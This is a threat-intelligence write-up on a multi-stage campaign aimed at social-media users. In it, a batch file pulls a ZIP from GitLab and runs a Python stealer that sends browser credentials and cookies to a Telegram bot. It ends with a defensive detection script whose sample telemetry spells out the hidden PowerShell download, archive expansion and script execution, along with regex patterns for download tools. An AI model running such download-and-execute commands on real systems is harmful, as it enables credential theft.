Key takeaways

Cyble Research and Intelligence Labs (CRIL) recently discovered a WinRAR archive file on VirusTotal with minimal detection. Further analysis revealed that it is part of a new campaign targeting Social Media users. The campaign involves a multi-stage attack in which each stage has a distinct role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system. Threat Actors (TAs) use open-source code-sharing platforms like Gitlab to retrieve the next-stage payloads. The downloaded payload is a new Python-based stealer designed to pilfer process information and browser-stored data such as passwords, cookies, and web data, and it uses a Telegram channel to send the stolen information to the TAs.
On December 5th, CRIL came across a potentially malicious RAR file on VirusTotal and similar files began surfacing within a short timeframe. The investigation revealed that the identified archive file is linked to an ongoing scam targeting Social Media users, where TAs exploit the appeal of well-known products and compelling content to lure users into interacting with deceptive pages or groups. The RAR archive files contain a first-stage malicious batch file and a JSON file. The TAs use the batch file to execute a multi-stage infection strategy to deliver their final payload onto the victim’s system. The final payload is a Windows-specific Python-based stealer designed to collect various sensitive information and transmit it to a Telegram bot managed by the TAs.
When the batch file is executed, it runs PowerShell commands that retrieve a ZIP file from an open-source code-sharing platform, unzip its contents, and execute the Python script named “libb1.py”. This Python script is a sophisticated piece of malware designed to collect sensitive information from various browsers and send it to a Telegram channel controlled by the TAs. The script gathers running processes, login details, and cookie information from different browsers and transmits them to the TAs.
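The chain described above (a batch file spawning PowerShell to fetch a ZIP from a code-sharing site, expand it, and run a Python script from a user-writable path) is easy to look for in process-creation telemetry. The script below is an added detection example written for this write-up; it is not code from Cyble or from the campaign. The event schema, hostnames, file paths and the repository URL are constructed placeholders, not indicators from the report.

```python
"""Flag the multi-stage chain from the write-up in process-creation events.

Added example, not part of the original report. Event fields (host, image,
parent_image, cmdline) mirror common EDR/Sysmon telemetry; all sample values
below are constructed placeholders, not real IoCs.
"""
import re
from collections import defaultdict

# PowerShell download primitives commonly seen in first-stage batch loaders.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|downloadfile|net\.webclient|start-bitstransfer", re.I)
# Public code-sharing platforms used to host next-stage payloads.
CODESHARE_RE = re.compile(r"https?://(?:[\w.-]*\.)?(gitlab\.com|github\.com|bitbucket\.org)/", re.I)
# Archive expansion in PowerShell (cmdlet or .NET API).
UNZIP_RE = re.compile(r"expand-archive|zipfile\]::extracttodirectory", re.I)
# A .py script launched from a user-writable location.
PY_FROM_USER_PATH_RE = re.compile(r"(appdata|\\temp\\|\\public\\).*\.py\b", re.I)


def _is(path, *names):
    """True if the image path's basename is one of the given executable names."""
    return path.lower().rsplit("\\", 1)[-1] in names


def _ps(e):
    return _is(e["image"], "powershell.exe", "pwsh.exe")


# Each stage of the chain as (name, predicate over one event).
STAGES = [
    ("batch_spawns_powershell", lambda e: _ps(e) and _is(e["parent_image"], "cmd.exe")),
    ("download_from_codeshare", lambda e: _ps(e) and bool(DOWNLOAD_RE.search(e["cmdline"]))
                                          and bool(CODESHARE_RE.search(e["cmdline"]))),
    ("archive_expanded", lambda e: _ps(e) and bool(UNZIP_RE.search(e["cmdline"]))),
    ("python_from_user_path", lambda e: _is(e["image"], "python.exe", "pythonw.exe")
                                        and bool(PY_FROM_USER_PATH_RE.search(e["cmdline"]))),
]


def stages_per_host(events):
    """Return {host: sorted list of stage names observed on that host}."""
    hits = defaultdict(set)
    for e in events:
        for name, pred in STAGES:
            if pred(e):
                hits[e["host"]].add(name)
    return {h: sorted(s) for h, s in hits.items()}


def suspicious_hosts(events):
    """Flag a host when the code-share download and the Python-from-user-path
    stages both appear, or when three or more stages appear. A single stage
    (e.g. cmd.exe spawning PowerShell) is routine admin activity on its own."""
    flagged = []
    for host, stages in stages_per_host(events).items():
        s = set(stages)
        if {"download_from_codeshare", "python_from_user_path"} <= s or len(s) >= 3:
            flagged.append(host)
    return sorted(flagged)


# Constructed sample telemetry: WS-01 shows the full chain, WS-02 is benign.
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\offer\setup.bat"'},
    {"host": "WS-01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest https://gitlab.com/placeholder-org/placeholder-repo/-/raw/main/payload.zip -OutFile $env:TEMP\payload.zip"'},
    {"host": "WS-01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Expand-Archive -Path $env:TEMP\payload.zip -DestinationPath $env:TEMP\p"'},
    {"host": "WS-01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\p\python.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\Temp\p\python.exe C:\Users\victim\AppData\Local\Temp\p\libb1.py"},
    {"host": "WS-02", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Get-ChildItem C:\Logs | Measure-Object"'},
    {"host": "WS-02", "parent_image": r"C:\Program Files\Editor\Code.exe",
     "image": r"C:\Python312\python.exe",
     "cmdline": r"python.exe C:\Projects\app\main.py"},
]

if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, stages)
    print("flagged:", suspicious_hosts(SAMPLE_EVENTS))
```

The stage predicates are deliberately loose individually and only become an alert in combination; in production you would key the grouping on a process tree or a short time window rather than on the host alone, and extend `CODESHARE_RE` with whatever code-hosting domains your environment does not legitimately pull scripts from.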
This incident serves as another instance highlighting the ongoing threat to Social Media users from malicious campaigns targeting their personal information.